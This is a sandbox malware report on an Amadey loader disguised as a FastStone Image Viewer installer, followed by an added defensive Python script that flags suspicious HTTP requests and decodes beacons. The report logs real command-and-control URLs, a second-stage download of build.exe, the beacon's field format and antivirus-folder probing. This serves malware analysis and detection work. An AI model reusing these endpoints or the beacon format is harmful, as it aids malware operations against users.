Summary | ZeroBOX

update.exe

Category FILE
Machine s1_win7_x6401
Started April 23, 2021, 6:13 p.m.
Completed April 23, 2021, 6:36 p.m.
Size 2.4MB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 7806508028c78ff39211cdfe01a070ef
SHA256 0590cd6ecc0865f09c48eea98b04ff75fb49918eb14c0b0c53ce8215650acce3
CRC32 4824B57A
ssdeep 49152:Y7mY8pH4TXwyAuFjkzxF3uDfxKqj/qSmJYPKWOn6/YiM:Km34TXOgGxNuDfxKqjDyWQGYiM
Yara
  • PE_Header_Zero - PE File Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • IsPacked - Entropy Check
  • HasOverlay - Overlay Check
  • HasRichSignature - Rich Signature Check
  • escalate_priv - Escalate privileges
  • screenshot - Take screenshot
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_private_profile - Affect private profile
  • win_files_operation - Affect file operations

Name | Response | Post-Analysis Lookup
api.faceit.com | 104.17.63.50 |

IP Address | Status | Action
104.17.62.50 | Active | Moloch
164.124.101.2 | Active | Moloch
176.121.14.159 | Active | Moloch
185.215.113.67 | Active | Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 185.215.113.67:80 -> 192.168.56.101:49210 | 2400023 | ET DROP Spamhaus DROP Listed Traffic Inbound group 24 | Misc Attack
TCP 192.168.56.101:49225 -> 104.17.62.50:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.101:49210 -> 185.215.113.67:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected
TCP 192.168.56.101:49228 -> 185.215.113.67:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected
TCP 176.121.14.159:80 -> 192.168.56.101:49211 | 2400021 | ET DROP Spamhaus DROP Listed Traffic Inbound group 22 | Misc Attack
TCP 192.168.56.101:49211 -> 176.121.14.159:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | A Network Trojan was detected
TCP 176.121.14.159:80 -> 192.168.56.101:49211 | 2014819 | ET INFO Packed Executable Download | Misc activity
TCP 176.121.14.159:80 -> 192.168.56.101:49211 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation
TCP 176.121.14.159:80 -> 192.168.56.101:49211 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic
TCP 176.121.14.159:80 -> 192.168.56.101:49211 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 104.17.62.50:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined

Suricata TLS

No Suricata TLS

API: GetComputerNameW (status 1, return 1, repeated 0)
  computer_name: TEST22-PC

API: GlobalMemoryStatusEx (status 1, return 1, repeated 0)
section .ndata
suspicious_features: POST method with no referer header, POST method with no useragent header, Connection to IP address
suspicious_request: POST http://185.215.113.67/4dcYcWsw3/index.php
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://176.121.14.159/build.exe
request: POST http://185.215.113.67/4dcYcWsw3/index.php
request: GET http://176.121.14.159/build.exe
request: POST http://185.215.113.67/4dcYcWsw3/index.php
API: NtProtectVirtualMemory (status 1, return 0, repeated 0)
  process_identifier: 2552
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 0
  length: 4096
  protection: 64 (PAGE_EXECUTE_READWRITE)
  base_address: 0x72902000
  process_handle: 0xffffffff
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libgcc_s_sjlj-1.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libxml4.dll
file C:\Users\test22\AppData\Local\Temp\build.exe
file C:\Users\test22\AppData\Roaming\FastStoneSoft\FastStoneImageViewer.exe
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libbonjour.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libogg-0.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\zlib.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libEGL.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libgraph31.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libpangoft2-1.0-0.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libgcc_s_sjlj-1.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libbonjour.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libEGL.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libxml4.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libgraph31.dll
file C:\Users\test22\AppData\Local\Temp\build.exe
file C:\Users\test22\AppData\Roaming\FastStoneSoft\FastStoneImageViewer.exe
API: InternetReadFile (status 1, return 1, repeated 0)
  request_handle: 0x00cc000c
  buffer: MZ ... "This program cannot be run in DOS mode." ... PE header with sections .text, .data, .pubazeg, .lawy, .tls, .new, .rsrc, .reloc, followed by x86 code (raw binary dump of the downloaded executable omitted; .pubazeg, .lawy and .new are non-standard section names)
host 176.121.14.159
host 185.215.113.67
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
API: HttpSendRequestA (status 1, return 1, repeated 0)
  headers: Content-Type: application/x-www-form-urlencoded
  request_handle: 0x00cc000c
  post_data: id=152138328664&vs=2.15&sd=7ea3f0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
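The following is an added example, not part of the ZeroBOX report and not code from the sample or the sandbox. It re-implements two pieces of the triage this report does for you: the "suspicious_features" heuristics applied to each captured HTTP request (POST with no Referer, any request with no User-Agent, host given as a bare IPv4 literal), and decoding of the check-in body captured in the HttpSendRequestA call, with a shape check that later beacons from the same campaign can be compared against. The two sample requests are reconstructed from the "request" lines and the HttpSendRequestA arguments above; because the report only states which headers were absent, the header dictionaries are an assumption. Only the pc and un fields are confirmed by the report itself (the GetComputerNameW result and the profile name in the dropped-file paths); the remaining keys are treated as opaque tokens.

```python
"""Triage of the HTTP artefacts in the report above (added example)."""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit


@dataclass
class HttpRequest:
    method: str
    url: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def is_dotted_quad(host: str) -> bool:
    """True when the URL host is a literal IPv4 address, i.e. no DNS lookup preceded it."""
    try:
        return isinstance(ipaddress.ip_address(host), ipaddress.IPv4Address)
    except ValueError:
        return False


def suspicious_features(req: HttpRequest) -> List[str]:
    """Mirror the three heuristics the report lists under suspicious_features.

    A Referer is only expected on a POST (browser form submits carry one);
    a missing User-Agent is unusual for any method.
    """
    present = {k.lower() for k in req.headers}
    host = urlsplit(req.url).hostname or ""
    feats: List[str] = []
    if req.method == "POST" and "referer" not in present:
        feats.append("POST method with no referer header")
    if "user-agent" not in present:
        feats.append(f"{req.method} method with no useragent header")
    if is_dotted_quad(host):
        feats.append("Connection to IP address")
    return feats


# Key order taken verbatim from the captured post_data.
CHECKIN_KEYS = ("id", "vs", "sd", "os", "bi", "ar", "pc", "un", "dm", "av", "lv")


def parse_checkin(body: str) -> Dict[str, str]:
    """Decode an x-www-form-urlencoded beacon, keeping empty values such as dm=."""
    pairs = parse_qsl(body, keep_blank_values=True)
    fields = dict(pairs)
    if len(fields) != len(pairs):
        raise ValueError("duplicate key in beacon body")
    return fields


def matches_checkin_shape(req: HttpRequest) -> bool:
    """Shape derived from this single capture: form-encoded POST to an index.php
    path whose body carries exactly CHECKIN_KEYS in that order. It is a filter
    for this campaign's traffic, not a general signature (ET SID 2027700 above
    is the general detection)."""
    ctype = {k.lower(): v for k, v in req.headers.items()}.get("content-type", "")
    if req.method != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        return False
    if not urlsplit(req.url).path.endswith("/index.php"):
        return False
    keys = tuple(k for k, _ in parse_qsl(req.body, keep_blank_values=True))
    return keys == CHECKIN_KEYS


def triage(requests: List[HttpRequest], computer_name: str) -> List[dict]:
    """One finding per request: its heuristics and, where the shape matches,
    the decoded beacon plus whether its pc field equals the sandbox host name."""
    findings = []
    for req in requests:
        finding = {"request": f"{req.method} {req.url}",
                   "features": suspicious_features(req)}
        if matches_checkin_shape(req):
            fields = parse_checkin(req.body)
            finding["beacon"] = fields
            finding["pc_matches_host"] = fields.get("pc") == computer_name
        findings.append(finding)
    return findings


# Reconstructed from the report; header sets are assumed (only their absence is stated).
CAPTURED = [
    HttpRequest("POST", "http://185.215.113.67/4dcYcWsw3/index.php",
                {"Content-Type": "application/x-www-form-urlencoded"},
                "id=152138328664&vs=2.15&sd=7ea3f0&os=9&bi=1&ar=1"
                "&pc=TEST22-PC&un=test22&dm=&av=0&lv=0"),
    HttpRequest("GET", "http://176.121.14.159/build.exe"),
]

if __name__ == "__main__":
    for finding in triage(CAPTURED, "TEST22-PC"):
        print(finding)
```

Run stand-alone, the script reproduces the report's two suspicious_features lines for the POST and GET, decodes the beacon into eleven fields, and confirms that pc matches the TEST22-PC value returned by GetComputerNameW. Feed it proxy or PCAP-derived requests from your own environment to pick out check-ins of the same shape.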